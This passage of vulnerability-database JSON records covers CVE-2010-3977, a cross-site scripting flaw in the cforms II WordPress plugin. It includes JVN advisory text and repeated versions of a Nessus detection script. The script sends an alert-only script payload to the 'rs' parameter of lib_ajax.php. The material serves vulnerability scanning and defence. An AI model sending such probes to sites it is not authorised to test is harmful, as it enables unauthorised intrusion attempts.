4.3, "vector": "NONE"}}, "hash": "04a1e2e4661b76a6e22feaa29b77060bb042ebcd217075c3b038a8f2e0c7d43f", "hashmap": [{"hash": "7b13c919e9b3911cd8a4f3c9eb1b6b33", "key": "modified"}, {"hash": "91d8e04282ee4b6b8c31c44a1de9e25f", "key": "href"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "933e37c2beeefe4a041a3b0ae38030c5", "key": "reporter"}, {"hash": "7d4bd26157ee0c2c2b44464519ca0fd9", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e2bd4f48ef6667ad18b60c1e8f34deb7", "key": "type"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "0ff8ac6c106c7d40ef6d150c8881d63a", "key": "description"}, {"hash": "24b9de688e7c9a27ad8f08d023cd5726", "key": "cvelist"}, {"hash": "7b13c919e9b3911cd8a4f3c9eb1b6b33", "key": "published"}], "history": [], "href": "http://jvn.jp/en/jp/JVN35256978/index.html", "id": "JVN:35256978", "lastseen": "2019-04-04T02:57:44", "modified": "2012-02-15T00:00:00", "objectVersion": "1.3", "published": "2012-02-15T00:00:00", "references": [], "reporter": "Japan Vulnerability Notes", "title": "JVN#35256978: cforms II vulnerable to cross-site scripting", "type": "jvn", "viewCount": 5}, "differentElements": ["description"], "edition": 11, "lastseen": "2019-04-04T02:57:44"}, {"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2010-3977"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "\n ## Description\n\ncforms II provided by delicious days is a plugin for WordPress.\u00c2 cforms II contains a cross-site scripting vulnerability. \n\n\n ## Impact\n\nAn arbitrary script may be executed on the user's web browser. \n\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the developer. \n\n\n ## Products Affected\n\n * cforms II v13.1 and earlier\n", "edition": 67, "enchantments": {"dependencies": {"modified": "2019-04-12T16:55:00", "references": [{"idList": ["SSV:20225"], "type": "seebug"}, {"idList": ["CFORMS_RS_XSS.NASL"], "type": "nessus"}, {"idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"], "type": "securityvulns"}, {"idList": ["OPENVAS:1361412562310801628"], "type": "openvas"}, {"idList": ["EDB-ID:34946"], "type": "exploitdb"}, {"idList": ["CVE-2010-3977"], "type": "cve"}, {"idList": ["WPVDB-ID:8782"], "type": "wpvulndb"}, {"idList": ["PACKETSTORM:95395"], "type": "packetstorm"}]}, "score": {"value": 4.3, "vector": "NONE"}}, "hash": "04a1e2e4661b76a6e22feaa29b77060bb042ebcd217075c3b038a8f2e0c7d43f", "hashmap": [{"hash": "7b13c919e9b3911cd8a4f3c9eb1b6b33", "key": "modified"}, {"hash": "91d8e04282ee4b6b8c31c44a1de9e25f", "key": "href"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "933e37c2beeefe4a041a3b0ae38030c5", "key": "reporter"}, {"hash": "7d4bd26157ee0c2c2b44464519ca0fd9", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e2bd4f48ef6667ad18b60c1e8f34deb7", "key": "type"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "0ff8ac6c106c7d40ef6d150c8881d63a", "key": "description"}, {"hash": "24b9de688e7c9a27ad8f08d023cd5726", "key": "cvelist"}, {"hash": "7b13c919e9b3911cd8a4f3c9eb1b6b33", "key": "published"}], "history": [], "href": "http://jvn.jp/en/jp/JVN35256978/index.html", "id": "JVN:35256978", "lastseen": "2019-04-12T16:55:00", "modified": "2012-02-15T00:00:00", "objectVersion": "1.3", "published": "2012-02-15T00:00:00", "references": [], "reporter": "Japan Vulnerability Notes", "title": "JVN#35256978: cforms II vulnerable to cross-site scripting", "type": "jvn", "viewCount": 7}, "differentElements": ["description"], "edition": 67, "lastseen": "2019-04-12T16:55:00"}, {"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2010-3977"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "\n ## Description\n\ncforms II provided by delicious days is a plugin for WordPress. cforms II contains a cross-site scripting vulnerability. \n\n\n ## Impact\n\nAn arbitrary script may be executed on the user's web browser. \n\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the developer. \n\n\n ## Products Affected\n\n * cforms II v13.1 and earlier\n", "edition": 60, "enchantments": {"dependencies": {"modified": "2019-04-11T16:54:56", "references": [{"idList": ["SSV:20225"], "type": "seebug"}, {"idList": ["CFORMS_RS_XSS.NASL"], "type": "nessus"}, {"idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"], "type": "securityvulns"}, {"idList": ["OPENVAS:1361412562310801628"], "type": "openvas"}, {"idList": ["EDB-ID:34946"], "type": "exploitdb"}, {"idList": ["CVE-2010-3977"], "type": "cve"}, {"idList": ["WPVDB-ID:8782"], "type": "wpvulndb"}, {"idList": ["PACKETSTORM:95395"], "type": "packetstorm"}]}, "score": {"value": 4.3, "vector": "NONE"}}, "hash": "7194689ae43e2cdb457c3391e3dc94f6114b333058f51ffe5a920e9682b2fc90", "hashmap": [{"hash": "7b13c919e9b3911cd8a4f3c9eb1b6b33", "key": "modified"}, {"hash": "91d8e04282ee4b6b8c31c44a1de9e25f", "key": "href"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "349fd187ddd58a4249cd77ff09f57538", "key": "description"}, {"hash": "933e37c2beeefe4a041a3b0ae38030c5", "key": "reporter"}, {"hash": "7d4bd26157ee0c2c2b44464519ca0fd9", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e2bd4f48ef6667ad18b60c1e8f34deb7", "key": "type"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "24b9de688e7c9a27ad8f08d023cd5726", "key": "cvelist"}, {"hash": "7b13c919e9b3911cd8a4f3c9eb1b6b33", "key": "published"}], "history": [], "href": "http://jvn.jp/en/jp/JVN35256978/index.html", "id": "JVN:35256978", "lastseen": "2019-04-11T16:54:56", "modified": "2012-02-15T00:00:00", "objectVersion": "1.3", "published": "2012-02-15T00:00:00", "references": [], "reporter": "Japan Vulnerability Notes", "title": "JVN#35256978: cforms II vulnerable to cross-site scripting", "type": "jvn", "viewCount": 7}, "differentElements": ["description"], "edition": 60, "lastseen": "2019-04-11T16:54:56"}, {"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2010-3977"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "\n ## Description\n\ncforms II provided by delicious days is a plugin for WordPress. cforms II contains a cross-site scripting vulnerability. \n\n\n ## Impact\n\nAn arbitrary script may be executed on the user's web browser. \n\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the developer. \n\n\n ## Products Affected\n\n * cforms II v13.1 and earlier\n", "edition": 40, "enchantments": {"dependencies": {"modified": "2019-04-08T16:54:17", "references": [{"idList": ["SSV:20225"], "type": "seebug"}, {"idList": ["CFORMS_RS_XSS.NASL"], "type": "nessus"}, {"idList": ["SECURITYVULNS:DOC:25042", "SECURITYVULNS:VULN:11223"], "type": "securityvulns"}, {"idList": ["OPENVAS:1361412562310801628"], "type": "openvas"}, {"idList": ["EDB-ID:34946"], "type": "exploitdb"}, {"idList": ["CVE-2010-3977"], "type": "cve"}, {"idList": ["WPVDB-ID:8782"], "type": "wpvulndb"}, {"idList": ["PACKETSTORM:95395"], "type": "packetstorm"}]}, "score": {"value": 4.3, "vector": "NONE"}}, "hash": "7194689ae43e2cdb457c3391e3dc94f6114b333058f51ffe5a920e9682b2fc90", "hashmap": [{"hash": "7b13c919e9b3911cd8a4f3c9eb1b6b33", "key": "modified"}, {"hash": "91d8e04282ee4b6b8c31c44a1de9e25f", "key": "href"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "349fd187ddd58a4249cd77ff09f57538", "key": "description"}, {"hash": "933e37c2beeefe4a041a3b0ae38030c5", "key": "reporter"}, {"hash": "7d4bd26157ee0c2c2b44464519ca0fd9", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e2bd4f48ef6667ad18b60c1e8f34deb7", "key": "type"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "24b9de688e7c9a27ad8f08d023cd5726", "key": "cvelist"}, {"hash": "7b13c919e9b3911cd8a4f3c9eb1b6b33", "key": "published"}], "history": [], "href": "http://jvn.jp/en/jp/JVN35256978/index.html", "id": "JVN:35256978", "lastseen": "2019-04-08T16:54:17", "modified": "2012-02-15T00:00:00", "objectVersion": "1.3", "published": "2012-02-15T00:00:00", "references": [], "reporter": "Japan Vulnerability Notes", "title": "JVN#35256978: cforms II vulnerable to cross-site scripting", "type": "jvn", "viewCount": 5}, "differentElements": ["description"], "edition": 40, "lastseen": "2019-04-08T16:54:17"}], "edition": 81, "hashmap": [{"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "cvelist", "hash": "24b9de688e7c9a27ad8f08d023cd5726"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "cvss2", "hash": "25131d66a9f3961140b068f4b41aa42b"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "0ff8ac6c106c7d40ef6d150c8881d63a"}, {"key": "href", "hash": "91d8e04282ee4b6b8c31c44a1de9e25f"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "7b13c919e9b3911cd8a4f3c9eb1b6b33"}, {"key": "published", "hash": "7b13c919e9b3911cd8a4f3c9eb1b6b33"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "933e37c2beeefe4a041a3b0ae38030c5"}, {"key": "title", "hash": "7d4bd26157ee0c2c2b44464519ca0fd9"}, {"key": "type", "hash": "e2bd4f48ef6667ad18b60c1e8f34deb7"}], "hash": "641ae38f0f48896c6e719999e7493ebf446703426111202959b1c37a3a008ba7", "viewCount": 11, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-3977"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11223", "SECURITYVULNS:DOC:25042"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:95395"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801628"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:8CE453E5-6EAC-4991-BFAF-260D34E0A71B"]}, {"type": "nessus", "idList": ["CFORMS_RS_XSS.NASL"]}, {"type": "seebug", "idList": ["SSV:20225"]}, {"type": "exploitdb", "idList": ["EDB-ID:34946"]}], "modified": "2021-07-28T14:34:18", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2021-07-28T14:34:18", "rev": 2}}, "objectVersion": "1.6", "scheme": null, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {}}], "nessus": [{"id": "CFORMS_RS_XSS.NASL", "hash": "fcfd6279d5f0be4586601414dd8f925c", "type": "nessus", "bulletinFamily": "scanner", "title": "cformsII Plugin for WordPress 'rs' Parameter XSS", "description": "The version of the cformsII plugin for WordPress hosted on the remote web server fails to sanitize user-supplied input to the 'rs' parameter of the 'lib_ajax.php' script before using it to generate dynamic HTML output.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script code into a user's browser to be executed within the security context of the affected site.\n\nNote that the install is also likely to be vulnerable to a similar cross-site scripting attack involving the 'rsargs' parameter, although Nessus has not checked for this particular issue.", "published": "2010-11-08T00:00:00", "modified": "2021-01-19T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {"score": null, "vector": null}, "href": "https://www.tenable.com/plugins/nessus/50512", "reporter": "This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3977", "https://www.securityfocus.com/archive/1/514579/30/0/threaded"], "cvelist": ["CVE-2010-3977"], "immutableFields": [], "lastseen": "2021-10-16T02:34:52", "history": [{"bulletin": {"id": "CFORMS_RS_XSS.NASL", "hash": "88afcc05a5be4f3eab5f97a41b21d9dda63183b4da8bda2258c2bea4cad50896", "type": "nessus", "bulletinFamily": "scanner", "title": "cformsII Plugin for WordPress 'rs' Parameter XSS", "description": "The version of the cformsII plugin for WordPress hosted on the remote web server fails to sanitize user-supplied input to the 'rs' parameter of the 'lib_ajax.php' script before using it to generate dynamic HTML output.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script code into a user's browser to be executed within the security context of the affected site.\n\nNote that the install is also likely to be vulnerable to a similar cross-site scripting attack involving the 'rsargs' parameter, although Nessus has not checked for this particular issue.", "published": "2010-11-08T00:00:00", "modified": "2015-01-13T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=50512", "reporter": "Tenable", "references": ["http://www.securityfocus.com/archive/1/514579/30/0/threaded"], "cvelist": ["CVE-2010-3977"], "immutableFields": [], "lastseen": "2016-09-26T17:25:33", "history": [], "viewCount": 1, "enchantments": {}, "objectVersion": "1.6", "pluginID": "50512", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50512);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2015/01/13 20:37:05 $\");\n\n script_cve_id(\"CVE-2010-3977\");\n script_bugtraq_id(44587);\n script_osvdb_id(69339);\n script_xref(name:\"Secunia\", value:\"42006\");\n\n script_name(english:\"cformsII Plugin for WordPress 'rs' Parameter XSS\");\n script_summary(english:\"Attempts to inject script code via lib_ajax.php.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP script that is vulnerable to a\ncross-site scripting attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the cformsII plugin for WordPress hosted on the remote\nweb server fails to sanitize user-supplied input to the 'rs' parameter\nof the 'lib_ajax.php' script before using it to generate dynamic HTML\noutput.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script\ncode into a user's browser to be executed within the security context\nof the affected site.\n\nNote that the install is also likely to be vulnerable to a similar\ncross-site scripting attack involving the 'rsargs' parameter, although\nNessus has not checked for this particular issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/514579/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\"Unknown at this time.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2015 Tenable Network Security, Inc.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nplugin = \"cformsII\";\n\n# Check KB first\ninstalled = get_kb_item(\"www/\"+port+\"/webapp_ext/\"+plugin+\" under \"+dir);\n\nif (!installed)\n{\n checks = make_array();\n path = \"/wp-content/plugins/\";\n checks[path + \"cforms/js/cforms.js\"][0] = make_list('var sajax_');\n\n # Ensure plugin is installed\n installed = check_webapp_ext(\n checks : checks,\n dir : dir,\n port : port,\n ext : plugin\n );\n}\nif (!installed)\n audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + \" plugin\");\n\n# Try to exploit the issue.\npayload = SCRIPT_NAME;\nenc_payload = '';\nfor(i=0; i<strlen(payload); i++)\n{\n enc_payload += ord(payload[i]) + ',';\n}\nenc_payload = substr(enc_payload, 0, strlen(enc_payload) - 2);\nalert = '<script>alert(String.fromCharCode('+enc_payload+'))</script>';\n\nvuln = test_cgi_xss(\n port : port,\n cgi : '/wp-content/plugins/cforms/lib_ajax.php',\n dirs : make_list(dir),\n qs : 'rs='+urlencode(str:alert),\n pass_str : '-:' + alert + ' not callable',\n pass2_re : ' not callable'\n);\nif (!vuln)\n audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + \" plugin\");\n", "naslFamily": "CGI abuses : XSS", "cpe": [], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2016-09-26T17:25:33", "differentElements": ["cpe"], "edition": 1}, {"bulletin": {"id": "CFORMS_RS_XSS.NASL", "hash": "7e170c536445e496db15660333636ee702900ee09b41294dfd8fb6d68e43e243", "type": "nessus", "bulletinFamily": "scanner", "title": "cformsII Plugin for WordPress 'rs' Parameter XSS", "description": "The version of the cformsII plugin for WordPress hosted on the remote web server fails to sanitize user-supplied input to the 'rs' parameter of the 'lib_ajax.php' script before using it to generate dynamic HTML output.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script code into a user's browser to be executed within the security context of the affected site.\n\nNote that the install is also likely to be vulnerable to a similar cross-site scripting attack involving the 'rsargs' parameter, although Nessus has not checked for this particular issue.", "published": "2010-11-08T00:00:00", "modified": "2015-01-13T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=50512", "reporter": "Tenable", "references": ["http://www.securityfocus.com/archive/1/514579/30/0/threaded"], "cvelist": ["CVE-2010-3977"], "immutableFields": [], "lastseen": "2017-10-29T13:41:32", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "50512", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50512);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2015/01/13 20:37:05 $\");\n\n script_cve_id(\"CVE-2010-3977\");\n script_bugtraq_id(44587);\n script_osvdb_id(69339);\n script_xref(name:\"Secunia\", value:\"42006\");\n\n script_name(english:\"cformsII Plugin for WordPress 'rs' Parameter XSS\");\n script_summary(english:\"Attempts to inject script code via lib_ajax.php.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP script that is vulnerable to a\ncross-site scripting attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the cformsII plugin for WordPress hosted on the remote\nweb server fails to sanitize user-supplied input to the 'rs' parameter\nof the 'lib_ajax.php' script before using it to generate dynamic HTML\noutput.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script\ncode into a user's browser to be executed within the security context\nof the affected site.\n\nNote that the install is also likely to be vulnerable to a similar\ncross-site scripting attack involving the 'rsargs' parameter, although\nNessus has not checked for this particular issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/514579/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\"Unknown at this time.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2015 Tenable Network Security, Inc.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nplugin = \"cformsII\";\n\n# Check KB first\ninstalled = get_kb_item(\"www/\"+port+\"/webapp_ext/\"+plugin+\" under \"+dir);\n\nif (!installed)\n{\n checks = make_array();\n path = \"/wp-content/plugins/\";\n checks[path + \"cforms/js/cforms.js\"][0] = make_list('var sajax_');\n\n # Ensure plugin is installed\n installed = check_webapp_ext(\n checks : checks,\n dir : dir,\n port : port,\n ext : plugin\n );\n}\nif (!installed)\n audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + \" plugin\");\n\n# Try to exploit the issue.\npayload = SCRIPT_NAME;\nenc_payload = '';\nfor(i=0; i<strlen(payload); i++)\n{\n enc_payload += ord(payload[i]) + ',';\n}\nenc_payload = substr(enc_payload, 0, strlen(enc_payload) - 2);\nalert = '<script>alert(String.fromCharCode('+enc_payload+'))</script>';\n\nvuln = test_cgi_xss(\n port : port,\n cgi : '/wp-content/plugins/cforms/lib_ajax.php',\n dirs : make_list(dir),\n qs : 'rs='+urlencode(str:alert),\n pass_str : '-:' + alert + ' not callable',\n pass2_re : ' not callable'\n);\nif (!vuln)\n audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + \" plugin\");\n", "naslFamily": "CGI abuses : XSS", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2017-10-29T13:41:32", "differentElements": ["modified", "sourceData"], "edition": 2}, {"bulletin": {"id": "CFORMS_RS_XSS.NASL", "hash": "3d58fe08431e9c9900415d769ab1f39be2ae54177922e80da27a21fa91ca99d7", "type": "nessus", "bulletinFamily": "scanner", "title": "cformsII Plugin for WordPress 'rs' Parameter XSS", "description": "The version of the cformsII plugin for WordPress hosted on the remote web server fails to sanitize user-supplied input to the 'rs' parameter of the 'lib_ajax.php' script before using it to generate dynamic HTML output.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script code into a user's browser to be executed within the security context of the affected site.\n\nNote that the install is also likely to be vulnerable to a similar cross-site scripting attack involving the 'rsargs' parameter, although Nessus has not checked for this particular issue.", "published": "2010-11-08T00:00:00", "modified": "2018-07-02T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=50512", "reporter": "Tenable", "references": ["http://www.securityfocus.com/archive/1/514579/30/0/threaded"], "cvelist": ["CVE-2010-3977"], "immutableFields": [], "lastseen": "2018-07-03T10:05:31", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "50512", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50512);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/02 18:48:52\");\n\n script_cve_id(\"CVE-2010-3977\");\n script_bugtraq_id(44587);\n script_xref(name:\"Secunia\", value:\"42006\");\n\n script_name(english:\"cformsII Plugin for WordPress 'rs' Parameter XSS\");\n script_summary(english:\"Attempts to inject script code via lib_ajax.php.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP script that is vulnerable to a\ncross-site scripting attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the cformsII plugin for WordPress hosted on the remote\nweb server fails to sanitize user-supplied input to the 'rs' parameter\nof the 'lib_ajax.php' script before using it to generate dynamic HTML\noutput.\n\nAn attacker can leverage this issue to inject arbitrary HTML or script\ncode into a user's browser to be executed within the security context\nof the affected site.\n\nNote that the install is also likely to be vulnerable to a similar\ncross-site scripting attack involving the 'rsargs' parameter, although\nNessus has not checked for this particular issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/514579/30/0/threaded\");\n script_set_attribute(attribute:\"solution\", value:\"Unknown at this time.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\n\napp = \"WordPress\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port\n);\ndir = install['path'];\ninstall_url = build_url(port:port, qs:dir);\n\nplugin = \"cformsII\";\n\n# Check KB first\ninstalled = get_kb_item(\"www/\"+port+\"/webapp_ext/\"+plugin+\" under \"+dir);\n\nif (!installed)\n{\n checks = make_array();\n path = \"/wp-content/plugins/\";\n checks[path + \"cforms/js/cforms.js\"][0] = make_list('var sajax_');\n\n # Ensure plugin is installed\n installed = check_webapp_ext(\n checks : checks,\n dir : dir,\n port : port,\n ext : plugin\n );\n}\nif (!installed)\n audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + \" plugin\");\n\n# Try to exploit the issue.\npayload = SCRIPT_NAME;\nenc_payload = '';\nfor(i=0; i<strlen(payload); i++)\n{\n enc_payload += ord(payload[i]) + ',';\n}\nenc_payload = substr(enc_payload, 0, strlen(enc_payload) - 2);\nalert = '<script>alert(String.fromCharCode('+enc_payload+'))</script>';\n\nvuln = test_cgi_xss(\n port : port,\n cgi : '/wp-content/plugins/cforms/lib_ajax.php',\n dirs : make_list(dir),\n qs : 'rs='+urlencode(str:alert),\n pass_str : '-:' + alert + ' not callable',\n pass2_re : ' not 